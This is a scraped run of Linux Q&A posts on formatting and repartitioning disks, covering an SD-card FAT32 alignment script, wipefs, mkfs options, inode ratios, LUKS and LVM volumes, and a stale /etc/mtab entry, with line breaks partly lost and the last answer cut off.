# Parts of the procudure base on the work of Denys Dmytriyenko
# http://wiki.omap.com/index.php/MMC_Boot_Format# exit if any command fails
set -eexport LC_ALL=Cformat_whole_disk_fat32() {
if ! id | grep -q root; then
echo "This utility must be run prefixed with sudo or as root"
return 1
fi local DRIVE=$1 # Make sure drive isn't mounted
# so hopefully this will fail e.g. if we're about to blow away the root filesystem
for mounted in $(findmnt -o source | grep "^$DRIVE") ; do
umount "$mounted"
done # Make sure current partition table is deleted
wipefs --all $DRIVE # Get disk size in bytes
local SIZE=$(fdisk -l $DRIVE | grep Disk | grep bytes | awk '{print $5}')
echo DISK SIZE – $SIZE bytes # Note: I'm changing our default cluster size to 32KiB since all of
# our 8GiB cards are arriving with 32KiB clusters. The manufacturers
# may know something that we do not *or* they're trading speed for
# more space.
local CLUSTER_SIZE_KB=32
local CLUSTER_SIZE_IN_SECTORS=$(( $CLUSTER_SIZE_KB * 2 )) # This won't work for drives bigger than 32GiB because
# 32GiB / 64kiB clusters = 524288 FAT entries
# 524288 FAT entries * 4 bytes / FAT = 2097152 bytes
# 2097152 bytes / 512 bytes = 4096 sectors for FAT size
# 4096 * 2 = 8192 sectors for both FAT tables which leaves no
# room for the BPB sector
if [ $SIZE -ge $(( ($CLUSTER_SIZE_KB / 2) * 1024 * 1024 * 1024 )) ]; then
echo -n "This drive is too large, >= $(($CLUSTER_SIZE_KB / 2))GiB, for this "
echo "formatting routine."
return 1
fi # Align partitions for SD card performance/wear optimization
# Summary: start 1st partition at sector 8192 (4MiB) and align FAT32
# data to start at 8MiB (4MiB logical)
# There's a document that explains why, but its too long to
# reproduce here.
{
echo 8192,,0x0C,*
} | sfdisk -uS -q $DRIVE sleep 1 if [ -b ${DRIVE}1 ]; then
PART1=${DRIVE}1
elif [ -b ${DRIVE}p1 ]; then
PART1=${DRIVE}p1
else
echo "Improper partitioning on $DRIVE"
return 1
fi # Delete any old filesystem visible in new partition
wipefs --all $PART1 # Format FAT32 with 64kiB clusters (128 * 512)
# Format once to get the calculated FAT size
local FAT_SIZE=$(mkdosfs -F 32 -s $CLUSTER_SIZE_IN_SECTORS -v ${PART1} | \
sed -n -r -e '/^FAT size is/ s,FAT size is ([0-9]+) sectors.*$,\1,p') # Calculate the number of reserved sectors to pad in order to align
# the FAT32 data area to 4MiB
local RESERVED_SECTORS=$(( 8192 - 2 * $FAT_SIZE )) # Format again with padding
mkdosfs -F 32 -s $CLUSTER_SIZE_IN_SECTORS -v -R $RESERVED_SECTORS ${PART1} # Uncomment to label filesystem
#fatlabel ${PART1} BOOT
}#set -xformat_whole_disk_fat32 "$@" |
I need to reformat an SD card back to factory status.
SD card filesystem used for media has become corrupted. Accessing a certain directory causes the filesystem to be remounted readonly, and it cannot be deleted. fsck.vfat says that it does not have a repair method for the specific type of corruption.
| Reformat SD card |
Thanks to @frostschutz, his suggestion worked for.
Just for completeness I am adding that as an answer,
Using following commands did the trick for me.
wipefs -a /dev/mmcblk0p[0-9]*
wipefs -a /dev/mmcblk0First command deleted filesystem information from each partitions.
second command deleted partition table.
|
We have Beaglbone black based custom board with 256MB RAM and 4GB eMMC.
We have script to flash software on the board.
Script erases gpt partition table using following commands
#Delete primary gpt (first 17KiB)
dd if=/dev/zero of=/dev/mmcblk0 bs=1024 count=17
#Delete secondary gpt (last 17KiB)
dd if=/dev/zero of=/dev/mmcblk0 seek=3735535 bs=1024 count=17Partitions gets deleted however script re-partitions eMMC again in the same number of partitions.
After that it tries to format each partition using mkfs.ext4 (e2fsprogs version 1.42.13).
Now while formatting a partition mkfs.ext4 complains that partition has filesystem on it and it was mounted at particular date in past and ask if it should proceed ?
/dev/mmcblk0p15 contains a ext4 file system labelled 'rootfs'
last mounted on /mnt/rfs_src on Fri Feb 16 13:52:18 2018
Proceed anyway? (y,n)This was not happening in past i.e. with e2fsprog version 1.42.8
same script used to work.
From release note of e2fsprog-1.42.13 I see that last mounted is added to some structure.
Now question is how can we remove this last mounted information from partition?
I tried wipfs -a but it has the same behavior.
One way to zero while eMMC, however that will take lot of time.
Any suggestion/pointers ?
| How to erase gpt partition table and how to make old partition forget mount information |
It turns out that the device node needed to be created with
mknod /dev/ram1 b 1 1Once this is done, it can be formatted via e.g. mkfs.ext2:
mkfs.ext2 /dev/ram1 8192 |
I'm installing a CentOS 7 VM, and I would like to create a RAM disk inside the %pre section of a Kickstart file.
However, doing so via
mkfs -q /dev/ram1 8192is not possible as the mkfs binary is not present in the Kickstart environment, and all other mkfs.* filesystem-specific commands return an error "/dev/ram1: no such file or directory".
Is there any other way to do so?
| How to create a RAM disk from the Kickstart environment? |
When all else fails, use the actual sources! There, we see that the fields being printed are:
fprintf(stderr,
_("Pass completed, %u bad blocks found. (%d/%d/%d errors)\n"),
bb_count, num_read_errors, num_write_errors, num_corruption_errors);In other words, they are the number of read errors, write errors, and corruption errors.
|
I'm trying to format a supposedly defective hard disk using "mkfs.ext3 -cc /dev/sda1" on a partition that spans over the entire disk.
I wish to understand the meaning of the ongoing error report in mkfs.ext3's command output, on the last line: "...(109/0/0 errors)". I didn't find information about these three values in man pages and other sources.
This is the ongoing output of the running command:
# mkfs.ext3 -cc /dev/sda1
mke2fs 1.42.4 (12-June-2012)
Filesystem label=
OS type: Linux
Block size=4096 (log=2)
Fragment size=4096 (log=2)
Stride=0 blocks, Stripe width=0 blocks
61054976 inodes, 244190390 blocks
12209519 blocks (5.00%) reserved for the super user
First data block=0
Maximum filesystem blocks=4294967296
7453 block groups
32768 blocks per group, 32768 fragments per group
8192 inodes per group
Superblock backups saved in blocks:
32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632, 2654208,
4096000, 7962624, 11239424, 20480000, 23887872, 71663616, 78675968,
102400000, 214990848Checking with model 0xaa: done
Reading and comparision: 94.30% done, 24:09:03 elapsed. (109/0/0 errors) | Meaning of "mkfs.ext3 -cc" error report |
Use the -F option to force mkfs.ntfs to create the file system. See the mkfs.ntfs man page.
|
I have an 8GB USB storage and lsblk shows it is accessible at /dev/sdb.
When trying to:
sudo mkfs.ntfs -L "label" /dev/sdbI got:
/dev/sdb is entire device, not just one partition.
Refusing to make a filesystem here!What to do?
I'm on Ubuntu 18.04.
| Can't format USB storage at /dev/sdb |
/dev/sdb1 tells me that the drive is partitioned. You will have to repartition the drive so that the first partition is limited to 2 GB or less, and then create the FAT32 file system on this partition.
EDIT: as an alternative solution, you can tell mkdosfs to limit the file system size, instead of using the whole partition. According to the mkdosfs man page, you can specify a block count as the last parameter after the device name. I guess the block size is 512 bytes, so the number of blocks would be 2G divided by 512.
|
I need to produce a custom live Lubuntu version on a 2GB pendrive. But don't have the pen right now, so I need to test it with the 16GB that I have at hand. The system won't start the live version if this pen is formatted to full capacity (tested on Dell and HP computers), but found that one possible solution is to format it at a smaller size. What would be the command to do so? Currently I'm using sudo mkdosfs -F 32 -I /dev/sdb1, and get the expected 14.5GB available storage.
Update: from the selected answer
$sudo fdisk /dev/sdb
> p
> n
> p
> 1
> [Intro]
> +2G
> p
> w | How to format a 16GB pendrive to store only 2GB |
OK, so in Computer Science, I'm not overly fond of saying "you can't get there from here", but in this case, you're trying to fit a square peg into a round hole.
The Sector size is usually set by the DEVICE. The 2048B sector size reported is normal for a CD/DVD drive, whereas 512B (or 520B -- which is why I said USUALLY -- some hard drives can actually switch from 512 to 520 and back).
When you ran fdisk, it clearly showed that the media sector size is 2048B. You can't easily change that, and in all likelihood, you can't change that period. You could try contacting the manufacturer of the USB drive to see if there is a tool available to reset the sector size on that device... or you could drive to the store (Walmart? Target? Staples? you name it!) and spend the $5 to $10 to buy a new USB stick.
|
I am trying hard to format a 1GB USB stick so that I can use it to install a new linux OS. Because the Disk utility has failed me when creating the file system. I tried to do it manually using fdisk by going through the following steps to create the master boot record and a 1GB partition:
# fdisk /dev/sdcCommand (m for help): p
Disk /dev/sdc: 994.5 MiB, 1042808832 bytes, 509184 sectors
Units: sectors of 1 * 2048 = 2048 bytes
Sector size (logical/physical): 2048 bytes / 2048 bytes
I/O size (minimum/optimal): 2048 bytes / 2048 bytes
Disklabel type: dos
Disk identifier: 0x967a68dbDevice Boot Start End Blocks Id System
/dev/sdc1 * 1 509183 1018366 b W95 FAT32Command (m for help): oCreated a new DOS disklabel with disk identifier 0x727b4976.Command (m for help): nPartition type:
p primary (0 primary, 0 extended, 4 free)
e extended
Select (default p): p
Partition number (1-4, default 1): 1
First sector (512-509183, default 512):
Last sector, +sectors or +size{K,M,G,T,P} (512-509183, default 509183): Created a new partition 1 of type 'Linux' and of size 993.5 MiB.Command (m for help): v
Partition 1: cylinder 253 greater than maximum 252
Partition 1: previous sectors 509183 disagrees with total 507835
Remaining 511 unallocated 2048-byte sectors.Command (m for help): wThe partition table has been altered.
Calling ioctl() to re-read partition table.
Syncing disks.Then I tried to format it to FAT32 file system with 512 bytes sector size, but it says the minimum allowed is 2048 bytes.
# mkfs.fat -v -F 32 -S 512 /dev/sdc1
mkfs.fat 3.0.26 (2014-03-07)
Warning: sector size was set to 2048 (minimal for this device)
WARNING: Not enough clusters for a 32 bit FAT!
/dev/sdc1 has 33 heads and 61 sectors per track,
hidden sectors 0x0800;
logical sector size is 2048,
using 0xf8 media descriptor, with 508672 sectors;
drive number 0x80;
filesystem has 2 32-bit FATs and 8 sectors per cluster.
FAT size is 125 sectors, and provides 63548 clusters.
There are 32 reserved sectors.
Volume ID is 1ab3abc1, no volume label.I need 512 bytes sector as syslinux does not support larger sector size.
| How to format a 1GB USB stick to FAT32 with 512 bytes sector? |
Your free space is roughly 7.3*1024*1024*1024 bytes. On average, the size of a file is expected to be 100*1024 bytes. This means you have room for approximately
7.3*1024*1024*1024 / (100*1024) = 7.3*1024*1024/100 ≃ 76,546distinct files. That implies you need precisely that many inodes.
The mke2fs output indicates you currently have 15,104 inodes; it's no wonder you run out of them -- you need approx. five times as many.
I believe you are missing that the -i option already directly specifies your expected average file size. You need one inode per (distinct) file, so if your avg file size is 100KB, then a new inode should be assigned to every 100KB of storage. Simply re-run the command with -i $((100*1024)).
(Your current option -i 524288 tells mke2fs that your usual file size will be 512KB, which is cca. five times larger than reality -- that's why you get cca. five times fewer inodes than needed.)
In summary, just read "bytes-per-inode" as "bytes-per-distinct-file".
|
How approximately calc bytes-per-inode for ext2?
I have 7.3GB storage (15320519 sectors 512B each). I have made ext2 filesystem with block size 4096
mke2fs /dev/sda2 -i 524288 -m 0 -L "SSD" -F -b 4096 -U 11111111-2222-3333-4444-555555555555 -O none,filetype,sparse_super,large_fileFilesystem label=SSD
OS type: Linux
Block size=4096 (log=2)
Fragment size=4096 (log=2)
15104 inodes, 1915064 blocks
0 blocks (0%) reserved for the super user
First data block=0
Maximum filesystem blocks=4194304
59 block groups
32768 blocks per group, 32768 fragments per group
256 inodes per group
Superblock backups stored on blocks:
32768, 98304, 163840, 229376, 294912, 819200, 884736, 1605632Usually all my files has size 100kB (and about 5 files can be 400MB). I try to read this and this. But still not clear how approximately calc bytes-per-inode? Current 524288 is not enough, for now I can't make new files in sda2 but still have a lot of free space.
P.S. Extra info
# df -T
Filesystem Type 1K-blocks Used Available Use% Mounted on
/dev/root ext4 146929 84492 59365 59% /
devtmpfs devtmpfs 249936 0 249936 0% /dev
tmpfs tmpfs 250248 0 250248 0% /dev/shm
tmpfs tmpfs 250248 56 250192 0% /tmp
tmpfs tmpfs 250248 116 250132 0% /run
/dev/sda2 ext2 7655936 653068 7002868 9% /mnt/sda2# df -h
Filesystem Size Used Available Use% Mounted on
/dev/root 143.5M 82.5M 58.0M 59% /
devtmpfs 244.1M 0 244.1M 0% /dev
tmpfs 244.4M 0 244.4M 0% /dev/shm
tmpfs 244.4M 56.0K 244.3M 0% /tmp
tmpfs 244.4M 116.0K 244.3M 0% /run
/dev/sda2 7.3G 637.8M 6.7G 9% /mnt/sda2# fdisk -l
Disk /dev/sda: 7.45 GiB, 8001552384 bytes, 15628032 sectors
Disk model: 8GB ATA Flash Di
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x0a19a8afDevice Boot Start End Sectors Size Id Type
/dev/sda1 309 307508 307200 150M 83 Linux
/dev/sda2 307512 15628030 15320519 7.3G 83 Linux | ext2 How to choose bytes/inode ratio |
You are correct writing that the original ext2 superblock specification does not make provision for storing the file system creation date.
But leaves 788 bytes Unused starting from offset 236.
Unused meaning free for use by the programs creating/using the filesystem.
Ext4 contrarily makes provision for storing when the filesystem was created, in seconds since the epoch, s_mkfs_time, at offset 0x108 of an ext4 type superblock… that is precisely… 264 decimal.
For easing the coding of tools working more or less generally with all the ext family of filesystems, some utilities dedicated to filesystem creation might fill some of the unused 788 bytes of an ext2 superblock with ext4-like infos.
This being for example the case of the busybox mkfs_ext2 utility. cf line 522 :
STORE_LE(sb->s_mkfs_time, timestamp); |
I am trying to find the creation date on an ext2 file system. I seem to get a current date using dumpe2fs.
The problem is that the original ext2 superblock specification does not contain such information, though it seems like there might be an extension to the original fields (something about after byte 264).In fact using hexdump on the superblock (hexdump -s 1024 -n 1024 -C /dev/vdb) I can find 4 bytes starting from byte 265 that containg a hex number which contain in little endian the unix time of the file system creation. Any information on how, why and under what circumstances that it there?
Thanks in advance
| Unix ext2 superblock - file system creation date |
Could be down to a bad USB cable or/and insufficient/missing external power source. Some USB ports are simply too underpowered to drive a HDD.
|
My SATA HD used as an external disk connected to a USB port is not working. When I try to format it using sudo mkfs.ext4 /dev/sdj1, I get: "Input/output error while writing out and closing file system".
In dmesg, I see
[ 3819.478357] usb 4-3: USB disconnect, device number 47
[ 3819.478535] xhci_hcd 0000:00:14.0: WARN Set TR Deq Ptr cmd failed due to incorrect slot or ep state.
[ 3819.498268] blk_update_request: I/O error, dev sdj, sector 487239680 op 0x1:(WRITE) flags 0x4000 phys_seg 256 prio class 0
[ 3819.498366] blk_update_request: I/O error, dev sdj, sector 487241728 op 0x1:(WRITE) flags 0x4000 phys_seg 256 prio class 0
[ 3819.498432] blk_update_request: I/O error, dev sdj, sector 2048 op 0x1:(WRITE) flags 0x800 phys_seg 8 prio class 0
[ 3819.498444] Buffer I/O error on dev sdj1, logical block 0, lost async page write
[ 3819.498450] Buffer I/O error on dev sdj1, logical block 1, lost async page write
[ 3819.498453] Buffer I/O error on dev sdj1, logical block 2, lost async page write
[ 3819.498455] Buffer I/O error on dev sdj1, logical block 3, lost async page write
[ 3819.498458] Buffer I/O error on dev sdj1, logical block 4, lost async page write
[ 3819.498461] Buffer I/O error on dev sdj1, logical block 5, lost async page write
[ 3819.498463] Buffer I/O error on dev sdj1, logical block 6, lost async page write
[ 3819.498466] Buffer I/O error on dev sdj1, logical block 7, lost async page write
[ 3819.498514] blk_update_request: I/O error, dev sdj, sector 487243776 op 0x1:(WRITE) flags 0x4000 phys_seg 256 prio class 0
[ 3819.500108] blk_update_request: I/O error, dev sdj, sector 2528 op 0x1:(WRITE) flags 0x4800 phys_seg 2048 prio class 0
[ 3819.500114] Buffer I/O error on dev sdj1, logical block 480, lost async page write
[ 3819.500117] Buffer I/O error on dev sdj1, logical block 481, lost async page write
[ 3819.500927] blk_update_request: I/O error, dev sdj, sector 487245824 op 0x1:(WRITE) flags 0x4000 phys_seg 256 prio class 0
[ 3819.502469] blk_update_request: I/O error, dev sdj, sector 4576 op 0x1:(WRITE) flags 0x4800 phys_seg 2048 prio class 0
[ 3819.503514] blk_update_request: I/O error, dev sdj, sector 487247872 op 0x1:(WRITE) flags 0x4000 phys_seg 256 prio class 0
[ 3819.505103] blk_update_request: I/O error, dev sdj, sector 6624 op 0x1:(WRITE) flags 0x4800 phys_seg 2048 prio class 0
[ 3819.505902] blk_update_request: I/O error, dev sdj, sector 487249920 op 0x1:(WRITE) flags 0x4000 phys_seg 256 prio class 0
[ 3819.742439] sd 9:0:0:0: [sdj] Synchronizing SCSI cache
[ 3819.742459] sd 9:0:0:0: [sdj] Synchronize Cache(10) failed: Result: hostbyte=DID_NO_CONNECT driverbyte=DRIVER_OK
[ 3820.014442] usb 4-3: new SuperSpeed USB device number 48 using xhci_hcdI can I find out if the problem lies on the disk or in the SATA-to-USB adapter if I don't have other disks and adapters to test?
| External HDD disconnects when formating. Disk or SATA-to-USB adapter problem? |
Depending on where you're going to use that disk: there might be problems - Linux doesn't care, but other OS'es/appliances might.
Years ago I had a box for recording TV that needed an external disk to save the recordings to. The documentation for the box said that it supported using NTFS and VFAT, but the box' own software only supported making NTFS, and as NTFS wasn't well-supported on Linux (it might have been read-only or something, and I wanted to be able to use it from Linux) in those days. So I attached the disk to my linux, and made a VFAT filesystem on it. When I moved it back to the box, it could see the disk but not use it (it might have tried, but failed very quickly). I had a hard time figuring out what was wrong, until I for some reason got to think about partition types - and quite right: the partition was marked to contain an NTFS filesystem, but contained a VFAT filesystem (because I hadn't cared about the partition type when, as soon as I had changed the partition type, the box had no problems using the disk.
| What I DidI attach an HDD, lsblk -S shows this drive as sdc
I use sudo parted /dev/sdc/ to start parted against sdc
I create a partition table as: mklabel gpt
I make a partition: mkpart my-cool-partition and,
select ext2 as my file typeAccording to man, this actually:Creates a new partition, without creating a new file system on that partitionYou may specify a file system type, to set the appropriate partition code in the partition table for the new partitionTherefore, I understand that Parted kindly "provisioned" or "optimized" (I hope that's the correct mindset) for me to later format the drive with ext2, for my above example.
However...then I use sudo mkfs.ntfs to format with NTFS instead of ext2. The result is: mkntfs completed successfully. Have a nice dayI don't understand how mkpart is necessary at all. I will not lie to Parted in real life, but if I did, will there be problems?
Environment: Debian, XFCE, xfce4-terminal, Bash
| Why does Parted mkpart ask for file system type, if I can later format with another file system? [duplicate] |
Essentially what you have done by using mkfs.ntfs -F /dev/sdb or whatever against that flash disk is that you have forced upon the flash disk an ntfs partition.
The alert you are getting and this is just my hunch here is because you mounted it as vfat in /etc/mtab then forced an overwrite of the file system using ntfs. Although that's just speculative.
Always unmount before making any filesystem changes to avoid that error.
|
It occurred that I typed -F (--force) instead of -f (--fast) while running mkfs.ntfs command. The USB drive was mounted. What are possible consequences to the drive?
There's also a message "Hope /etc/mtab is incorrect". What does it mean?
| What happens if I format a mounted USB drive with --force flag? |
Unless you want to rebuild your LVM structure, you should not format any partitions. Instead, you should format the logical volumes through the device mapper. Run lsblk. You'll see something like this:
`-sda2 8:2 0 4.5G 0 part
`-VolGroup00-lvolroot 254:0 0 4.5G 0 lvm /As you can see, the mapper has made a mapped device available named VolGroup00-lvolroot. Formatting the partition that this logical volume lives on would remove the logical volume. You would end up with your root filesystem directly on the partition. It would end up looking something like this:
`-sda2 8:2 0 4.5G 0 part /The logical volumes are usually accessible in the /dev/mapper directory as symbolic links to files in /dev named dm-*. For example, the VolGroup00-lvolroot volume is accessible at /dev/mapper/VolGroup00-lvolroot. If you're making a new filesystem for your root partition, you should run something along the lines of
mkfs.ext4 /dev/mapper/VolGroup00-lvolroot |
My system currently has a volume group containing root, swap, and home logical volumes. I would like to reinstall the operating system in the root volume and format the partition in the process. I don't know how logical volumes work so I don't know if there is any information about the volume group that is stored on the root partition. If I reformat the root partition, will this remove my ability to access the volume group?
| Is it safe to reformat an lvm root partition? |
Sounds like a hardware problem. You should run badblocks in write mode on the device.
Another option would beto create a small image file (a few 100 MiB)
put a loop device upon it
create the filesystem in it
copy the image file to the (first part of the) device
compare the image file to the respective part of the devicedd if=/dev/zero of=/path/to/imagefile bs=1M count=100losetup /dev/loop0 /path/to/imagefilemkfs.ext4 /dev/loop0blockdev --getsz /dev/loop0
204800dd if=imagefile of=/dev/mapper/lukssha1sum imagefile
aaafc117548aaebef3dbb5f4a609022e386192b6 imagefiledd if=/dev/mapper/luks count=204800 | sha1sum
204800+0 Datensätze ein
204800+0 Datensätze aus
aaafc117548aaebef3dbb5f4a609022e386192b6 - |
I've successfully created a LUKS drive from a 32Mb USB flash drive. However when I write an ext4 filesystem to it I am unable to mount the result, or even run fsck or dumpe2fs etc.
The drive shows up under lsblk as
sda 8:0 1 31M 0 disk
└─luks 253:0 0 15M 0 cryptI'm then writing the filesystem with sudo mkfs.ext4 -v /dev/mapper/luks, which produces
mke2fs 1.45.5 (07-Jan-2020)
fs_types for mke2fs.conf resolution: 'ext4', 'small'
Filesystem label=
OS type: Linux
Block size=4096 (log=2)
Fragment size=4096 (log=2)
Stride=0 blocks, Stripe width=0 blocks
3840 inodes, 3840 blocks
192 blocks (5.00%) reserved for the super user
First data block=0
Maximum filesystem blocks=4194304
1 block group
32768 blocks per group, 32768 fragments per group
3840 inodes per groupAllocating group tables: done
Writing inode tables: done
Creating journal (1024 blocks): done
Writing superblocks and filesystem accounting information: doneOutput from various commands
$ sudo cryptsetup luksDump /dev/sda
LUKS header information
Version: 2
Epoch: 3
Metadata area: 16384 [bytes]
Keyslots area: 16744448 [bytes]
UUID: 1f30e940-4144-4980-a32a-4f1b78a46fc5
Label: (no label)
Subsystem: (no subsystem)
Flags: (no flags)Data segments:
0: crypt
offset: 16777216 [bytes]
length: (whole device)
cipher: aes-xts-plain64
sector: 512 [bytes]Keyslots:
0: luks2
Key: 512 bits
Priority: normal
Cipher: aes-xts-plain64
Cipher key: 512 bits
PBKDF: argon2i
Time cost: 4
Memory: 187471
Threads: 4
Salt: 5c c4 28 e0 bc f6 7f df b2 1c 77 b6 fa f3 f1 bc
48 66 fc 56 e3 5c e5 13 cc af 1d 52 ec df fc 93
AF stripes: 4000
AF hash: sha256
Area offset:32768 [bytes]
Area length:258048 [bytes]
Digest ID: 0
Tokens:
Digests:
0: pbkdf2
Hash: sha256
Iterations: 18853
Salt: 62 8a b7 2c 4d 74 d3 6b 46 c2 9b 34 e2 d6 5c 3d
06 12 ee a7 5b b0 81 1f d0 99 19 b6 4f de 5c 77
Digest: c2 71 c1 d5 de 16 d9 cc 8c 15 f2 34 21 42 3a a3
24 d1 82 26 cd ab f9 98 0c 0a 68 7a 35 e2 3d a9^The Subsystem: (no subsystem) line is worrying
$ sudo mount -v /dev/mapper/luks /media/luks
mount: /media/luks: wrong fs type, bad option, bad superblock on /dev/mapper/luks, missing codepage or helper program, or other error.$ sudo fsck /dev/mapper/luks
fsck from util-linux 2.34
e2fsck 1.45.5 (07-Jan-2020)
ext2fs_open2: Bad magic number in super-block
fsck.ext2: Superblock invalid, trying backup blocks...
fsck.ext2: Bad magic number in super-block while trying to open /dev/mapper/luks
...^fsck.ext2 suggests to me that it can't tell the filesystem
$ sudo dumpe2fs /dev/mapper/luks
dumpe2fs 1.45.5 (07-Jan-2020)
dumpe2fs: Bad magic number in super-block while trying to open /dev/mapper/luks
Couldn't find valid filesystem superblock.All of these suggest to me that the filesystem hasn't been created correctly, however from what I can tell even a measly 15Mb should be enough space and I'm not sure what else could be the problem
| Unable create ext4 filesystem under LUKS |
From the documentation you cited:The XFS filesystem [...] does not require any change in the default settings, either at filesystem creation time or at mount.Source: https://kafka.apache.org/documentation/#xfs
So it should just work. Also there is nothing special anymore about a 20TB device size.
Consider adding a partition table and then use /dev/sdb1 instead of /dev/sdb.
|
We need to create xfs file-system on kafka disk
The special thing about kafka disk is the disk size
kafka disk have 20TB size in our case
I not sure about the following mkfs , but I need advice to understand if the following cli , is good enough to create xfs file system on huge disk ( kafka machine )
DISK=sdb
mkfs.xfs -L kafka /dev/$DISK -f kafka best practiceFileSystem Selection
Kafka uses regular files on disk, and such it has no hard dependency on a specific file system.
We recommend EXT4 or XFS. Recent improvements to the XFS file system have shown it to have the better performance characteristics for Kafka’s workload without any compromise in stability.
Note: Do not use mounted shared drives and any network file systems. In our experience Kafka is known to have index failures on such file systems. Kafka uses MemoryMapped files to store the offset index which has known issues on a network file systems. | What is the right mkfs cli in order to create xfs file-system on huge disk |
No, not really
Unless you are operating a RAID, no special measures must be taken.
As other answers said, SSDs tend to have a block size of 4k byte instead of 512 byte. For years partition tools are aware of this, hence the partitions are aligned to 1 MiB starts. You can check with fdisk -l /dev/sdx: If the output looks like this, you are fine:
Disk /dev/sdx: xxx GiB, xxx bytes, xxx sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 4096 bytesDevice Start End Sectors Size Type
/dev/sdx1 2048 xxx xxx xxxx xx xxxxNotice how this SSD has 4 kB blocks, yet the numbers represent "sectors" of 512 byte.
As for the fstab settings, there once was a debate of explicitly requesting usage of the TRIM command. Current Linuxes are already pre-configured to operate in sensible manner (as discussed here).
Of course, copying the data with dd is much easier if the SSD is alt least as big as the HDD. If the SSD is smaller, I recommend gparted's copy and paste functions (you need to re-install the bootloader, tough).
|
I would like to move from an HD to an SSD. Is there anything special to consider here? For example:Different recommended fstab settings
mkfs or partition tools behaving differently when operating on an HD vs on an SSD -- so I'd end up with a file system optimized for an HD on my SSD. | Anything special to consider when cloning an HD to an SSD? |
You are trying to install Arch inside partition 7 of your SD card.
What you have done is to create two partitions inside that one partition. The fdisk utility has assumed that /dev/mmcblk0p7 is the SD Card (whereas it's actually just a partition on the SD Card) and derived the two partition names from it, /dev/mmcblk0p7p1 and /dev/mmcblk0p7p2. These won't exist so you can't reference them.
In case there's any confusion, the canonical name for your SD Card itself is /dev/mmcblk0.
|
I wanted to install Arch Linux on my Raspberry Pi 3 and I found this tab[Installation] article that describes the process step-by step: Now, I've run into a problem when I tried to create the vfat fs on the first partition:
My partition table:
Command (m for help): p
Disk /dev/mmcblk0p7: 28.4 GiB, 30438064128 bytes, 59449344 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x11a5fc51Device Boot Start End Sectors Size Id Type
/dev/mmcblk0p7p1 2048 206847 204800 100M c W95 FAT32 (LBA)
/dev/mmcblk0p7p2 206848 59449343 59242496 28.3G 83 Linuxbut still:
root@raspberrypi:/home/pi# mkfs.vfat /dev/mmcblk0p7p1
mkfs.fat 4.1 (2017-01-24)
mkfs.vfat: unable to open /dev/mmcblk0p7p1: No such file or directoryWhy is this and how can I get around it?
| mkfs.vfat can't find the first partition on my disk |
Try umount -f /media/sdb1 or umount -l /media/sdb1.
If all else fails you can manually edit /etc/mtab to remove the offending mount entry.
|
I'm running Ubuntu 14.10 Server (headless).
I have a group of USB flashdrives that I need to reformat for use across several devices. I've successfully mounted, formatted, copied files to, and unmounted three devices. Upon mounting the forth the system believes that the first partition of this drive has already been mounted; it has never been inserted into the server before. I cannot mount or unmount the partition at all. At this point I'm assuming that this is my fault somewhere along the way but I can't get things back to normal.The Devices
The USB drives are to be formatted with two partitions and an empty 8MB header. The table is required as they will be used for specialized equipment. Each device is roughly 2GB in size
USB Partition table (to-be): [-EMPTY 8MB-|-- >1.1GB FAT 16--|--751MB FAT16--]The USB devices will have, at the very least, one pre-formatted partition of either Ext4 or Fat16.
The Situation
I've inserted a new USB device. Attempting to mount the device fails:
$ sudo mount sdb1
mount: can't find sdb1 in /etc/fstab
$ ls /media # Mounting a partition defaults to here
<empty>
$ pmount sdb1
Error: device /dev/sdb1 is already mounted to /media/sdb1
$ ls /media
<empty>df does not display /dev/sdb1 at all
Filesystem 1K-blocks Used Available Use% Mounted on
/dev/sda2 944392620 35959148 860437980 5% /
none 4 0 4 0% /sys/fs/cgroup
udev 8183068 4 8183064 1% /dev
tmpfs 1638852 5640 1633212 1% /run
none 5120 0 5120 0% /run/lock
none 8194244 0 8194244 0% /run/shm
none 102400 4 102396 1% /run/user
/dev/sda1 523248 3436 519812 1% /boot/efifdisk displays the device correctly
Disk /dev/sdb: 1.9 GiB, 1993342976 bytes, 3893248 sectors
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x5651d77fDevice Boot Start End Sectors Size Id Type
/dev/sdb1 2048 2353151 2351104 1.1G 83 Linux
/dev/sdb2 2353152 3893247 1540096 752M 6 FAT16GParted will display the device correctly (size, partition(s), table, etc.) but shows that sdb1 is mounted. I can delete the partition, format to ext4, however I cannot format it to Fat16.
I can, however, mount sdb2 via pmount and view any files that exist. Unmounting, partitioning, and erasing it is always successful. If I insert additional devices (e.g. sdc) I can make any changes without issue. If I swap this device so that it is sdc instead of sdb I can still access it without any problems.
I'm assuming that I've goofed up and did not unmount properly sdb1 on a previous device which is causing this problem. I'm also assuming that mkfs.vfat is also experiencing issues because mkfs.ext3,mkfs.ext4 will run without errors.
Is there a way to recover from this problem? Would my (only) solution be to reboot the system? I'm hoping to avoid this because we have multiple data-fetching and data-hosting services up and running.Solution
Many thanks to steve for his simple solution. Of all my searches I did not happen to come across this.
If df, fdisk -l, umount -l, pumount do not work then you should check /etc/mtab next. This file had the following contents:
/dev/sda2 / ext4 rw,errors=remount-ro 0 0
proc /proc proc rw,nodev,noexec,nosuid 0 0
sysfs /sys sysfs rw,nodev,noexec,nosuid 0 0
none /sys/fs/cgroup tmpfs rw,uid=0,gid=0,mode=0755,size=1024 0 0
. . .
systemd /sys/fs/cgroup/systemd cgroup rw,nosuid,noexec,nodev,none,name=systemd 0 0
/dev/sdb1 /media/sdb1 ext4 rw,nodev,nosuid,noexec,errors=remount-ro,user 0 0That very last line was the source of the issue. Simply removing it fixed everything.
Please try using other guides/solutions before attempting this. I am not aware of any impact this could have on your system or device if other services are actively attempting to read/write/lock this partition.
| System claims my USB is mounted when I insert it and I cannot (un)mount it. How do I fix this? |
First, let us use the bytes notation to understand the concepts. Now, the actual size of the external HDD was 850GB which translates to 912680550400 bytes.
Block size and fragment size
